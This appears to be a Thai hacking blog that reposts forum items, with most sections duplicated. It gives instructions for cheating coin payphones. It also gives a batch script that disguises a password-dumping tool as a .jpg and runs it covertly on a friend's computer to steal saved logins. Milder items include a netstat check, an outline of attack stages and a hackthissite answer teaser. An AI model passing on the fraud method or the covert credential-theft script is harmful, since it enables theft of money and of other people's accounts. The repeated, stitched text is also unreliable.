ปัญหาที่1 ??? เราจะลงเข้าเครื่องเจ้าบอยตรงๆได้เรื่องแน่ เพราะ วินโดว์ของโปรแกรมแสดงออกมา เมื่อเข้าไปอ่านรายละเอียดพบว่าทั่ง4โปรแปรมแกรม สามารถเรียกผ่าน คอมมานไลด์ได้ ซึ่งการรันลักษณะนี้วินโดว์จะไม่แสดงออกมา
การโกงเครื่องโทรศัทพ์ตู้ จากคุณ อย่างเทพ
บทความยังเป็นเรื่องเกี่ยวกับโทรศัพท์สาธารณะอยู่ ฮุฮุ แต่ว่าอันนี้ยังใช้ได้แน่นอน
อุปกรณ์ที่ใช้ เหรียญ 1 บาท ,เหรียญ 10 บาท, และตู้โทรศัพท์นะท่าน แต่ต้องเป็นตู้ที่ที่หยอดเหรียญ
เป็นแนวตั้งเท่านั้น แนวนอนทำไม่ได้ วิธีคือ ให้วางเหรียญบาทกับเหรียญสิบต่อกัน โดยเหรียญบาท
จะต้องแย่เข้าตรงที่หยอดเหรียญประมาณครึ่งเหรียญ ส่วนเหรียญสิบจะเข้าไปนิดเดียว
แต่ยังไม่ได้หยอดลงตู้นะ แล้วให้ทำการปั่นเหรียญ 10 ขึ้นข้างบน แรงๆ (เดี๋ยวจะงง นึกถึงท่าตบหัวเพื่อน เหมือนกันเลย)
เหรียญ 10 กับเหรียญ 1 บาทจะตกไปพร้อมกัน แต่ผลที่ได้คือ เหรียญ 10 จะตกลงมา แต่เหรียญ 1 บาท
จะอยู่ในตู้ ค่าที่ได้หน้าตู้คือ 10 บาท เสียไปแค่ 1 บาทเท่านั้นเอง
ลองไปทำดูแต่ระวังโดนจับด้วยนะท่าน เดี๋ยวหาว่าไม่เตือน ฮุฮุ
--------------------
ข้อมูลจาก ruk-com.in.th
อุปกรณ์ที่ใช้ เหรียญ 1 บาท ,เหรียญ 10 บาท, และตู้โทรศัพท์นะท่าน แต่ต้องเป็นตู้ที่ที่หยอดเหรียญ
เป็นแนวตั้งเท่านั้น แนวนอนทำไม่ได้ วิธีคือ ให้วางเหรียญบาทกับเหรียญสิบต่อกัน โดยเหรียญบาท
จะต้องแย่เข้าตรงที่หยอดเหรียญประมาณครึ่งเหรียญ ส่วนเหรียญสิบจะเข้าไปนิดเดียว
แต่ยังไม่ได้หยอดลงตู้นะ แล้วให้ทำการปั่นเหรียญ 10 ขึ้นข้างบน แรงๆ (เดี๋ยวจะงง นึกถึงท่าตบหัวเพื่อน เหมือนกันเลย)
เหรียญ 10 กับเหรียญ 1 บาทจะตกไปพร้อมกัน แต่ผลที่ได้คือ เหรียญ 10 จะตกลงมา แต่เหรียญ 1 บาท
จะอยู่ในตู้ ค่าที่ได้หน้าตู้คือ 10 บาท เสียไปแค่ 1 บาทเท่านั้นเอง
ลองไปทำดูแต่ระวังโดนจับด้วยนะท่าน เดี๋ยวหาว่าไม่เตือน ฮุฮุ
--------------------
ข้อมูลจาก ruk-com.in.th
วิธีตรวจดูว่า ใครเข้ามา Hack เครื่องเราบ้าง
วิธีตรวจดูว่า ใครเข้ามา Hack เครื่องเราบ้าง
เอ.............. เราเล่น net เพลินๆอยู่นี่มีใครแอบเข้ามาหาเราหรือเปล่าน้อ
** Google แอบย่องมาเก็บข้อความในเครื่องเราไปโชว์ทั่วโลกบ้างมั้ยนี่
** แล้วพวกโฆษณา แฝงเข้ามาบ้างไหม อื่ม... เรามี Anti spyware แล้วนี่
** มีบรรดา hacker มาเยี่ยมบ้างไหม
เอางี้ มาดูวิธีแอบดูว่าใครหรือมีอะไรมาแวะหาเราบ้าง
ในขณะที่สมาชิกกำลังใช้งาน internet อยู่ (ไม่ว่าจะเป็น www, FTP, ตรวจสอบ mail ด้วย POP3/SMTP โดยผ่าน protocal TCP/IP)
ท่านรู้มั้ยว่ามีใคร connected มายังเครื่องคอมฯของท่านบ้าง (มีพวก Hacker มาป้วนเปี้ยนหรือเปล่า) และก็อยากทราบหรือไม่ว่ามาจากไหน
ไม่ยากครับที่จะตรวจสอบ เพียงทำตามขั้นตอน ข้างล่างนี้...
++ เริ่มที่ ตัว Start ให้ท่าน คลิกที่ Start ---> Run
++ ที่ Run พิมพ์คำว่า netstat 10 (10 หมายถึงให้ update การ connect ใหม่ทุก ๆ 10 วินาที)
++ เสร็จแล้ว กดปุ่ม < Enter >
จากนั้น โปรแกรมจะแสดง[ ในmode dos ] ให้เห็นว่ามีใคร Connected มายังเครื่องคอมฯของท่านบ้าง พร้อมกับแจ้ง address ให้ด้วย
วิธีนี้ สามารถใช้ใน '98, Me , XP [ 2000 - ไม่มีให้ลอง เลยไม่ทราบ ใครทราบแจ้งด้วยครับ ]
### ถ้าเป็นการ run หาในเครื่องเรา ก็จะแสดงเป็น localhost ....... [ ตามด้วยหมายเลข ]
credit : http://www.zone-it.com
ข้อมูลจาก ruk-com.in.th
โปรแกรม hack password (พวกการ login)
โปรแกรมนี้ชื่อ IEpass โปรแกรมแกรม hack cookie
บางคนจะไม่ค่อย ออกจากระบบ จะสามารถเอารหัสมาได้ง่ายดาย
โปรแกรม
http://www.uppicweb.com/show.php?id=2186212eafc3a0caad3f7be29207c97a
ถ้ามี cookie ในเครื่องมันจะแสดงออกมา
แต่สมมุติว่าไปบ้านเพื่อนแล้วเปิดโปรแกรมนี้ตอนเพื่อนอยู่ด้วยจะทำไม่ได้จึงมีวิธีที่ทำให้เอารหัสมาได้โดยไม่ผิดสังเกต
วิธีทำ
1.เปิด notepad
2.เพิ่มไปว่า @ echo off
ren 001.jpg 001.exe
001.jpg /stext 0001.jpg
ren 001.exe 001.jpg
end
3.แล้ว sever ชื่ออะไรก็ได้แต่ต้องลงท้ายด้วย .bat
4.โปรแกรมที่โหลดมาเปลียนชื่อเป็น 001.jpg แล้วเอาสองอันนี้ไปไว้ที่เดียวกัน
วิธีใช้
ไปที่เครื่องเพื่อนแล้วคลิกไฟล์ที่สร้าง ด้วย notepad มันจะใช้เวลา 2-3วิ เราจะได้ไฟล์อีกอันมาชื่อ 0001.jpg (ในนี้จะมีรหัสอยู่)
แล้วกลับบ้านไปเปิดไฟล์ 0001.jpg ด้วย notepad จะได้รหัสมาถ้าไม่มีไรอยู่ในไฟล์แสดงว่าเพื่อนออกจากระบบทุกครั้ง
ข้อมูลจาก ruk-com.in.th
บางคนจะไม่ค่อย ออกจากระบบ จะสามารถเอารหัสมาได้ง่ายดาย
โปรแกรม
http://www.uppicweb.com/show.php?id=2186212eafc3a0caad3f7be29207c97a
ถ้ามี cookie ในเครื่องมันจะแสดงออกมา
แต่สมมุติว่าไปบ้านเพื่อนแล้วเปิดโปรแกรมนี้ตอนเพื่อนอยู่ด้วยจะทำไม่ได้จึงมีวิธีที่ทำให้เอารหัสมาได้โดยไม่ผิดสังเกต
วิธีทำ
1.เปิด notepad
2.เพิ่มไปว่า @ echo off
ren 001.jpg 001.exe
001.jpg /stext 0001.jpg
ren 001.exe 001.jpg
end
3.แล้ว sever ชื่ออะไรก็ได้แต่ต้องลงท้ายด้วย .bat
4.โปรแกรมที่โหลดมาเปลียนชื่อเป็น 001.jpg แล้วเอาสองอันนี้ไปไว้ที่เดียวกัน
วิธีใช้
ไปที่เครื่องเพื่อนแล้วคลิกไฟล์ที่สร้าง ด้วย notepad มันจะใช้เวลา 2-3วิ เราจะได้ไฟล์อีกอันมาชื่อ 0001.jpg (ในนี้จะมีรหัสอยู่)
แล้วกลับบ้านไปเปิดไฟล์ 0001.jpg ด้วย notepad จะได้รหัสมาถ้าไม่มีไรอยู่ในไฟล์แสดงว่าเพื่อนออกจากระบบทุกครั้ง
ข้อมูลจาก ruk-com.in.th
ถึงเพื่อน ๆ ที่อยากเป็น Hacker !!
โลกเราเองเกิดขึ้นมาไม่รู้กี่ร้อยกี่พันล้านปีมาแล้ว.. อันนั้นไกลเกินไป..
แต่ทุก ๆ ช่วงเวลามีการพัฒนาและมีการเปลี่ยนแปลงตลอดเวลา !!
เมื่อเราเกิดมาแล้วเราก็อยากมีส่วนร่วมในการพัฒนาประเทศชาติ !!
การ ที่เพื่อน ๆ ทุกคนอยากเป็น hacker นั้น เป็นเรื่องดี เพราะอย่างน้อยมันมีคำถามในใจว่า สิ่งนั้นมันทำอะไร มันมีหลักการอย่างไร จะทำอย่างไรที่จะใช้งานมันได้ !!
คราวนี้เมื่อพิจารณาแล้ว hacker แท้จริงต้องเป็นผู้ที่มีประสบการณ์ในเชิงคอมพิวเตอร์สูง..
ถ้า เพื่อน ๆ ใช้ Visual Basic โดยไม่เคยเขียน C/C++ เพื่อน ๆ ก็จะไม่มีทางรู้ได้ว่า ฟังก์ชั่นที่พวกเรา Call นั้นเราจะสร้างมันขึ้นมาใช้อย่างไร !!
ถ้าพวกเรารู้จัก C/C++ แต่พวกเราไม่เคยเขียน Assembly พวกเราก็ไม่รู้ว่าภาย CPU มี Instruction Sets อะไรบ้าง ? เราจะเข้าถึงส่วนสำคัญต่าง ๆ ของฮาร์ดแวร์ได้อย่างไร เช่นอ่าน Sector แรกของ DISK ต่าง ๆ เช่น HDD, FDD ได้อย่าไงไร ? // นี่แบบพื้นฐานที่สุดแล้ว //
ถ้าเราไม่รู้ ในแต่ละชั้น มันก็เกิดการพอกพูนสิ่งไม่รู้เกิดขึ้นเรื่อย ๆ !!
ดัง นั้น HACKER จึงมักเป็นผู้รู้อย่างชัดเจนในแต่ละระดับ ว่าสามารถหรือไม่สามารถทำสิ่งนี้ได้ !! เมื่อรู้ว่าไม่สามารถทำสิ่งนี้ ในระดับนี้ ต้องลงไปในระดับที่ลึกเข้าไป.. เช่น เข้าไปสู่ C/C++ แล้วจึงอิมพลิเมนต์อะไรบางอย่างออกมาเพื่อแก้ปัญหา..
Basic Hacker
พื้นฐานนะครับ บอกไว้ก่อน เดี่ยวจะหาว่าผมยังโน้นยังนี้ครับ
คือว่าผมได้ซื้อหนังสือมาเล่มนึงเห้นว่ามีประโยช ก็เลยจะpost ให้ อ่านเป็น หัวข้อๆ ไปครับ
ว่าด้วยเรื่องของ
- การแกะรอย
- การสแกน
- การรวบรวมข้อมูล
- การเจาะระบบ
- การยกระดับสิทธิ
- การให้ได้มาซึ่ง commant shell(หรือว่าการ ขโมยดอส นั่นเองครับ)
- การข้อโมยข้อมูล
- การแผ่นขยายอิทธิพลของการโจมตี
- การทำลายร่องรอย
เดี่ยวผมว่างผมจะ post ใส่เรื่อยๆนะครับ ใจเย็นรอหน่อยนะครับ
เดี่ยววันที่ 4 นี้ผมจะไปมหาลยแล้วหล่ะ (อิอิ ตื่นเต้น ได้เรียกชื่อ รร ว่า มหาลัย เหมือนกะคนอื่นเค้า สักที 55+)
-----------------------------------------------------------------------------------
จัดทำ profile ให้กับเป้าหมาย (รู้เขารู้เรารบร้อย ชนะทั้งร้อย)
-----------------------------------------------------------------------------------
- การแกะรอย
การ แกะรอยอาจถูกมองเทียบได้กับการค้นหา Directory โทรศัพท์เพื่อหา เบอร์ โทรศัพท์และที่อยู่ของหน่วยงานเป้าหมาย ในขณะที่การสแกนนั้นเทียบได้กับการขับรถไปยังตำแหน่งเป้าหมายที่สนใจละหาดู ว่า อาคารไหนมีผู้ครอบครองอยู่ และมีประตูหน้างต่างใดบ้างที่สามารถเข้าไปภายในใด้(อาจจะหมายถึง port นะครับ) การแกะรอยและการสแกนยงเปรียบเทียบได้กับการพยายามค้นหาเป้าหมายและเส้นทาง สำหรับเข้าไปสู่ภายในเห็นได้ชัดว่า การโจมตีที่ผิดพลาด หรือการมองข้ามรายละเอียดเล็กๆน้อยๆของประตูที่ถูกเปิดไว่สามารถทำให้การ โจมตีนั้นไร้ประโยชน์หรือตกรางไปอย่างสิ้นเชิงครับ
[ข้างบนอ่านสักนิดก็ดีครับ (อุส่าพิมพ์ตั้งนาน อิอิ) จะรู้ไปว่าการแกะรอยหมายถึงอะไรครับ]
คือว่าผมได้ซื้อหนังสือมาเล่มนึงเห้นว่ามีประโยช ก็เลยจะpost ให้ อ่านเป็น หัวข้อๆ ไปครับ
ว่าด้วยเรื่องของ
- การแกะรอย
- การสแกน
- การรวบรวมข้อมูล
- การเจาะระบบ
- การยกระดับสิทธิ
- การให้ได้มาซึ่ง commant shell(หรือว่าการ ขโมยดอส นั่นเองครับ)
- การข้อโมยข้อมูล
- การแผ่นขยายอิทธิพลของการโจมตี
- การทำลายร่องรอย
เดี่ยวผมว่างผมจะ post ใส่เรื่อยๆนะครับ ใจเย็นรอหน่อยนะครับ
เดี่ยววันที่ 4 นี้ผมจะไปมหาลยแล้วหล่ะ (อิอิ ตื่นเต้น ได้เรียกชื่อ รร ว่า มหาลัย เหมือนกะคนอื่นเค้า สักที 55+)
-----------------------------------------------------------------------------------
จัดทำ profile ให้กับเป้าหมาย (รู้เขารู้เรารบร้อย ชนะทั้งร้อย)
-----------------------------------------------------------------------------------
- การแกะรอย
การ แกะรอยอาจถูกมองเทียบได้กับการค้นหา Directory โทรศัพท์เพื่อหา เบอร์ โทรศัพท์และที่อยู่ของหน่วยงานเป้าหมาย ในขณะที่การสแกนนั้นเทียบได้กับการขับรถไปยังตำแหน่งเป้าหมายที่สนใจละหาดู ว่า อาคารไหนมีผู้ครอบครองอยู่ และมีประตูหน้างต่างใดบ้างที่สามารถเข้าไปภายในใด้(อาจจะหมายถึง port นะครับ) การแกะรอยและการสแกนยงเปรียบเทียบได้กับการพยายามค้นหาเป้าหมายและเส้นทาง สำหรับเข้าไปสู่ภายในเห็นได้ชัดว่า การโจมตีที่ผิดพลาด หรือการมองข้ามรายละเอียดเล็กๆน้อยๆของประตูที่ถูกเปิดไว่สามารถทำให้การ โจมตีนั้นไร้ประโยชน์หรือตกรางไปอย่างสิ้นเชิงครับ
[ข้างบนอ่านสักนิดก็ดีครับ (อุส่าพิมพ์ตั้งนาน อิอิ) จะรู้ไปว่าการแกะรอยหมายถึงอะไรครับ]
วันพฤหัสบดีที่ 8 มีนาคม พ.ศ. 2555
ขอคำชี้แนะ วิธีดูดาว ครับ
ขอคำชี้แนะ วิธีดูดาว ครับ
คือผมใช้โปรแกรม FTP FileZilla น่ะครับ ให้โปรแกรมมันจำพาสเอา
แต่ตอนนี้จำพาสไม่ได้แล้ว อยาก ได้วิธี ที่จะดู **** ว่ามันคืออะไรน่ะครับ
ขอคำชี้แนะด้วย ขอบคุณมากๆครับ
ปล. ลองใช้โปรแกรมพวกดูพาส หรือ sniffer จับ ftp ดู ก็ ไม่เห็นอ่ะครับ << อันนี้ก็ทำไม่ค่อยเป็นหรอกครับ ลองโหลดโปรแกรมมาลองเองมั่วๆ ถ้ามีวิธี สอนหน่อยก็ดีครับ ขอบคุณ
http://www.uppicme.com/share-5E9A_4F58D718.html
ข้อมูลจาก ruk-com.in.th
คือผมใช้โปรแกรม FTP FileZilla น่ะครับ ให้โปรแกรมมันจำพาสเอา
แต่ตอนนี้จำพาสไม่ได้แล้ว อยาก ได้วิธี ที่จะดู **** ว่ามันคืออะไรน่ะครับ
ขอคำชี้แนะด้วย ขอบคุณมากๆครับ
ปล. ลองใช้โปรแกรมพวกดูพาส หรือ sniffer จับ ftp ดู ก็ ไม่เห็นอ่ะครับ << อันนี้ก็ทำไม่ค่อยเป็นหรอกครับ ลองโหลดโปรแกรมมาลองเองมั่วๆ ถ้ามีวิธี สอนหน่อยก็ดีครับ ขอบคุณ
http://www.uppicme.com/share-5E9A_4F58D718.html
ข้อมูลจาก ruk-com.in.th
วันพุธที่ 7 มีนาคม พ.ศ. 2555
Hacking Web Application
Hacking Web Application
พูดถึง "Web" ในวันนี้ ไม่มีใครไม่รู้จัก "World Wide Web" หรือ "www" เพราะการค้นหาข้อมูลในการทำงานโดยเฉพาะคน IT นั้นจะปฏิเสธไม่ได้เลยว่าจำเป็นต้อง "เข้าWeb" เป็นประจำแทบทุกวัน ยกตัวอย่าง ตัวผมเองนั้นเข้า Web ของ "google.com" จนเรียกได้ว่าวันไหนถ้า Web google เข้าไม่ได้ ผมคงต้องรู้สึกหงุดหงิดและมีผลกับการทำงานพอสมควรเลยทีเดียว
สำหรับองค์กรในยุค ICT นี้ทุกบริษัทล้วนมี Web Site เป็นของตนเองแทบทั้งสิ้น ส่วนใหญ่เพื่อแสดงข้อมูลที่เปิดเผยได้ต่อสาธารณะ อันได้แก่ ข้อมูลผลิตภัณฑ์สินค้า แผนที่ เบอร์โทรศัพท์ ตลอดจนกิจกรรมต่างๆ ที่ต้องการเผยแพร่ซึ่งองค์กรจำเป็นต้องใช้ "Web Server" ในการจัดทำ "Web Site" โดยปกติทั่วไปแล้ว ข้อมูลจาก http://www.netcraft.com/ ได้รายงานว่า web site ทั่วโลกมีถึงกว่า 40 ล้าน web site ซึ่ง 66.52 % ใช้ Apache (Open Source) เป็น web server และ 24.64 % ใช้ IIS ของ Microsoft เป็น web server http://news.netcraft.com/archives/2003
/06/12/june_2003_web_server_survey.html
จาก ข้อมูลใน web site นี้ Hacker สามารถค้นประวัติของ web site เราได้ว่าเคยใช้ web server อะไร และมีการปรับปรุงเปลี่ยนแปลงเช่น Upgrade version หรือลง Patch อะไรบ้าง โดยสามารถ search จาก http://www.netcraft.com/ ได้โดยใส่ชื่อ web site ที่ต้องการค้นข้อมูลลงไป จะได้ผลลัพธ์ในรูปที่ 1
พูดถึง "Web" ในวันนี้ ไม่มีใครไม่รู้จัก "World Wide Web" หรือ "www" เพราะการค้นหาข้อมูลในการทำงานโดยเฉพาะคน IT นั้นจะปฏิเสธไม่ได้เลยว่าจำเป็นต้อง "เข้าWeb" เป็นประจำแทบทุกวัน ยกตัวอย่าง ตัวผมเองนั้นเข้า Web ของ "google.com" จนเรียกได้ว่าวันไหนถ้า Web google เข้าไม่ได้ ผมคงต้องรู้สึกหงุดหงิดและมีผลกับการทำงานพอสมควรเลยทีเดียว
สำหรับองค์กรในยุค ICT นี้ทุกบริษัทล้วนมี Web Site เป็นของตนเองแทบทั้งสิ้น ส่วนใหญ่เพื่อแสดงข้อมูลที่เปิดเผยได้ต่อสาธารณะ อันได้แก่ ข้อมูลผลิตภัณฑ์สินค้า แผนที่ เบอร์โทรศัพท์ ตลอดจนกิจกรรมต่างๆ ที่ต้องการเผยแพร่ซึ่งองค์กรจำเป็นต้องใช้ "Web Server" ในการจัดทำ "Web Site" โดยปกติทั่วไปแล้ว ข้อมูลจาก http://www.netcraft.com/ ได้รายงานว่า web site ทั่วโลกมีถึงกว่า 40 ล้าน web site ซึ่ง 66.52 % ใช้ Apache (Open Source) เป็น web server และ 24.64 % ใช้ IIS ของ Microsoft เป็น web server http://news.netcraft.com/archives/2003
/06/12/june_2003_web_server_survey.html
จาก ข้อมูลใน web site นี้ Hacker สามารถค้นประวัติของ web site เราได้ว่าเคยใช้ web server อะไร และมีการปรับปรุงเปลี่ยนแปลงเช่น Upgrade version หรือลง Patch อะไรบ้าง โดยสามารถ search จาก http://www.netcraft.com/ ได้โดยใส่ชื่อ web site ที่ต้องการค้นข้อมูลลงไป จะได้ผลลัพธ์ในรูปที่ 1
เฉลย วิธีผ่าน hackthissite level basic 1-10
เฉลย วิธีผ่าน hackthissite level basic 1-10
วิธีการผ่าน (basic hacking) Basic Missions 1 ถึง 10 ของ hackthissite.org
สำหรับมือใหม่เท่านั้นนะครับ คิดว่าไม่น่าจะใช้เวลาไม่เกิน 15 นาทีในการผ่าน basic mission นี้ครับ
http://www.hackthissite.org/missions/basic/
สำหรับเว็บนี้จะมีเกมส์ง่ายๆ สำหรับ hacker ฝึกหัดไว้เล่นแก้เครียดกันหลาย mission แต่หัวข้อนี้ผมจะแนะนำวิธีการในการผ่าน
basic mission กันก่อนครับ
เพิ่มเติม:
ก่อนเล่นต้องสมัครสมาชิกกันก่อนนะครับ
Nothing for guest!
เอาล่ะ ขอเอามาโพสที่นี้แล้วล่ะกานครับ
ข้อมูลจาก ruk-com.in.th
วิธีการผ่าน (basic hacking) Basic Missions 1 ถึง 10 ของ hackthissite.org
สำหรับมือใหม่เท่านั้นนะครับ คิดว่าไม่น่าจะใช้เวลาไม่เกิน 15 นาทีในการผ่าน basic mission นี้ครับ
http://www.hackthissite.org/missions/basic/
สำหรับเว็บนี้จะมีเกมส์ง่ายๆ สำหรับ hacker ฝึกหัดไว้เล่นแก้เครียดกันหลาย mission แต่หัวข้อนี้ผมจะแนะนำวิธีการในการผ่าน
basic mission กันก่อนครับ
เพิ่มเติม:
ก่อนเล่นต้องสมัครสมาชิกกันก่อนนะครับ
Nothing for guest!
เอาล่ะ ขอเอามาโพสที่นี้แล้วล่ะกานครับ
ข้อมูลจาก ruk-com.in.th
สมัครสมาชิก:
บทความ (Atom)